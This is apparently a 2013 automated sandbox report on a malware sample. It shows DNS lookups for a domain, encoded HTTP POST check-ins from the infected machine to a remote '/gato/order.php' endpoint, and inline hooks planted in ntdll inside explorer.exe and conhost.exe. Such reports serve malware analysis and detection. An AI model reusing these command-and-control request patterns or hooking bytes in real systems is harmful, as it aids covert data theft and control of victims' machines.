Nov 28, 2013 07:17:47.248678923 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:47.248691082 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:47.372385025 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:47.372394085 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:47.762839079 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:47.762851000 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:49.731966972 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:49.731980085 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:50.762788057 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:50.762804031 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:52.731554031 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:52.731560946 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:18:00.108830929 CET | 58439 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:18:00.108964920 CET | 53 | 58439 | 195.168.1.121 | 192.168.0.3
DNS Queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 28, 2013 07:16:52.426619053 CET | 192.168.0.3 | 195.168.1.121 | 0xe9e1 | Standard query (0) | dayzstreaming.co.uk | A (IP address) | IN (0x0001)
Nov 28, 2013 07:18:00.108830929 CET | 192.168.0.3 | 195.168.1.121 | 0x8492 | Standard query (0) | dayzstreaming.co.uk | A (IP address) | IN (0x0001)
DNS Answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 28, 2013 07:16:52.869318008 CET | 195.168.1.121 | 192.168.0.3 | 0xe9e1 | No error (0) | dayzstreaming.co.uk | | 37.221.170.194 | A (IP address) | IN (0x0001)
Nov 28, 2013 07:18:00.108964920 CET | 195.168.1.121 | 192.168.0.3 | 0x8492 | No error (0) | dayzstreaming.co.uk | | 37.221.170.194 | A (IP address) | IN (0x0001)
HTTP Request Dependency Graph
  • dayzstreaming.co.uk
HTTP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Header | Total Bytes Transferred (KB)
Nov 28, 2013 07:16:52.982619047 CET | 49180 | 80 | 192.168.0.3 | 37.221.170.194 | POST /gato/order.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: dayzstreaming.co.uk
Content-Length: 646
Cache-Control: no-cache
Data Ascii: ps0=0000000000000000000000000000000000000000000000000000000000&ps1=F3ADFD670F432699F858C2F783B205032940EE1627AF51DCFC4C974BB07C2CB42A5A45018D630E947E13F5C77FC6943D598B51282DF08C21C23F41E895996BFA0DD525D14466756382306CB85B08F2FB2489CD35403963593ECC4FF5B710F24C4B7D27491294076488588AD01274289A6994047C52A5E972E0D21D7397AC7718A514AE48BE70480A6ACAD37F5B5B59C05DB52E3A&cs1=5ECC83EA41CCE9EA6FCCD6EA7ACCCBEA7CCCD4EA59CCD8EA69CCD8EA41CCDBEA71CCD8EA7ECCD2EA6ECCD0EA71CCCFEA78CCCBEA2DCCE5EA73CCD7EA76CCC3EA7ECCC9EA6ECCD8EA6CCC97EA78CCC1EA78CC&cs2=74CCDCEA65CCC9EA71CCD6EA6FCCDCEA33CCDCEA65CCDCEA&cs3=7CCCDDEA70CCD0EA73CC94EA4DCCFAEA41CCD8EA79CCD4EA74CCD7EA
Total Bytes Transferred (KB): 5
Nov 28, 2013 07:18:00.121244907 CET | 49186 | 80 | 192.168.0.3 | 37.221.170.194 | POST /gato/order.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: dayzstreaming.co.uk
Content-Length: 636
Cache-Control: no-cache
Data Ascii: ps0=000000000000000000000000000000000000000000000000&ps1=FEFC3F440E068AC522699DF37C3FCC9E45A258F9786BE4BF90F9EA0E0F77AADACD9D160603B4B7B6939E542055BA85D57F0AE8674F270E75052572EDA43C0C347600A1A17956F17EED1A72D39A3B4828724FD8CD7D94AFEA31C4DD87B2025FE18E5FA5399278A06D9D39D262624A5A34B0DB307D75B9F9ACC76A89A203DEBAD54E5977D91555CFEB75BC69C2F68DDED87D246BC1&cs1=5ECC83EA41CCE9EA6FCCD6EA7ACCCBEA7CCCD4EA59CCD8EA69CCD8EA41CCDBEA71CCD8EA7ECCD2EA6ECCD0EA71CCCFEA78CCCBEA2DCCE5EA73CCD7EA76CCC3EA7ECCC9EA6ECCD8EA6CCC97EA78CCC1EA78CC&cs2=74CCDCEA65CCC9EA71CCD6EA6FCCDCEA33CCDCEA65CCDCEA&cs3=7CCCDDEA70CCD0EA73CC94EA4DCCFAEA41CCD8EA79CCD4EA74CCD7EA
Total Bytes Transferred (KB): 68

Code Manipulation Behavior

User Modules
Hook Summary
Function Name | Hook Type | Active in Processes
RtlFreeHeap | INLINE | conhost.exe
KiFastSystemCall | INLINE | explorer.exe
KiFastSystemCallRet | INLINE | explorer.exe
Processes
Process: conhost.exe, Module: ntdll.dll
Function Name | Hook Type | New Data
RtlFreeHeap | INLINE | 0x68 0x8D 0xD9 0x93 0x3E 0xE9
Process: explorer.exe, Module: ntdll.dll
Function Name | Hook Type | New Data
KiFastSystemCall | INLINE | 0xEB 0xB0 0x03 0x30 0x0F 0xF3
KiFastSystemCallRet | INLINE | 0xC3 0x36 0x68 0x81 0x1F 0xF8

System Behavior